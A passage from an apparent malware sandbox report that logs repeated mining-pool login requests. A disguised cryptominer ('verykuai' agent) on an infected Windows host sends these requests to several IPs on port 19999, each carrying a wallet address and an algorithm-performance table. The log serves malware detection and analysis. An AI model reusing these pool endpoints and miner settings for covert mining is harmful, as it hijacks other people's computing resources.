/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49773 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49774 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49775 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49776 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49777 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49778 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49779 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49780 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49781 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49782 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49783 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49784 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49785 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49786 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:65157 -> 5.161.70.189:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:65158 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:65159 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0